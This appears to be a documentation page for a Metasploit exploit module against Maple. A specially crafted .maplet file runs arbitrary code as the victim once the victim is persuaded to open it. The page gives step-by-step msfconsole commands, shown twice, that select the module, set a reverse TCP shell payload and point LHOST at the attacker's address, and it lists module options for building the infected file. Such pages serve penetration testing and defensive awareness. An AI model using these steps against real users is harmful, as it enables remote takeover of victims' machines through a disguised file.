Maple Maplet File Creation and Command Execution
This module harnesses Maple's ability to create files and execute commands automatically when opening a Maplet. All versions up to 13 are suspected vulnerable. Testing was conducted with version 13 on Windows. Standard security settings prevent code from running in a normal maple worksheet without user interaction, but those setting do not prevent code in a Maplet from running. In order for the payload to be executed, an attacker must convince someone to open a specially modified .maplet file with Maple. By doing so, an attacker can execute arbitrary code as the victim user.
Exploit Rank
- Excellent
Exploit Authors
- scriptjunkie < >
Vulnerability References
Exploit Targets
- 0 - Windows (default)
- 1 - Windows X64
- 2 - Linux
- 3 - Linux X64
- 4 - Universal CMD
Exploit Development
Similar Exploit Modules
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/fileformat/maple_maplet
msf exploit(maple_maplet) > show payloads
msf exploit(maple_maplet) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(maple_maplet) > set LHOST [MY IP ADDRESS]
msf exploit(maple_maplet) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/fileformat/maple_maplet
msf exploit(maple_maplet) > show payloads
msf exploit(maple_maplet) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(maple_maplet) > set LHOST [MY IP ADDRESS]
msf exploit(maple_maplet) > exploit
Exploit Module Options
| FILENAME | The output file. (default: msf.maplet) |
| TEMPLATE | The file to infect. (default: ) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EXE::Custom | Use custom exe instead of automatically generating a payload exe |
| EXE::FallBack | Use the default template in case the specified one is missing |
| EXE::Inject | Set to preserve the original EXE function |
| EXE::OldMethod | Set to use the substitution EXE generation method. |
| EXE::Path | The directory in which to look for the executable template |
| EXE::Template | The executable template file name. |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |